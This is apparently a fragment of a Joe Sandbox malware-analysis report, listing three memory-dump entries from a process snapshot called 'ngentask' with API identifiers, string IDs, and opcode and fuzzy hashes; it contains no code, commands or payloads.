                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnabledFindVisible
                                                                                                                      • String ID: TEk$fw$w
                                                                                                                      • API String ID: 18089171-1650657573
                                                                                                                      • Opcode ID: 802ddc08e65f075a8e6804e72eef4bc9b66d4397e9fbd3a9e5a186ac1f9e9fb1
                                                                                                                      • Instruction ID: 42b8097cafa45b3ab70ac05e9a44b887173912cb8e5f825cefcdd8df64589f78
                                                                                                                      • Opcode Fuzzy Hash: 802ddc08e65f075a8e6804e72eef4bc9b66d4397e9fbd3a9e5a186ac1f9e9fb1
                                                                                                                      • Instruction Fuzzy Hash: CB31F1B995C751DFD3348F24D8507EFB7E4EB8A305F05893CD9899B260DB3488918B86
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-3916222277
                                                                                                                      • Opcode ID: adefc81e243a333a41284b0ce5c5cd4c262681601008b0a0876e86edf09e69f1
                                                                                                                      • Instruction ID: 444d623a228d729f7ebde6f46af1a76120007dc39f6511e19822679111f862eb
                                                                                                                      • Opcode Fuzzy Hash: adefc81e243a333a41284b0ce5c5cd4c262681601008b0a0876e86edf09e69f1
                                                                                                                      • Instruction Fuzzy Hash: FB318FB4918304DFDB00EF68D985A5EBBF0BB89304F01896DE488DB360D770A949CF96
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1612877242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ngentask.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                      • String ID: ^
                                                                                                                      • API String ID: 2610073882-1590793086
                                                                                                                      • Opcode ID: 444702d241a70ce79c783c97807d7e1c73b1ab4471c9fa6b073bd9deb887ac46
                                                                                                                      • Instruction ID: c71001e4ab46b3d10acf56b45298640c99e2cfb66b3cac6edeaa9ee220a5b3da
                                                                                                                      • Opcode Fuzzy Hash: 444702d241a70ce79c783c97807d7e1c73b1ab4471c9fa6b073bd9deb887ac46
                                                                                                                      • Instruction Fuzzy Hash: 2131F760108BC29ED312CB3C8448619FFA17B56224F08879CD5F94BBD2D379A56AC7A2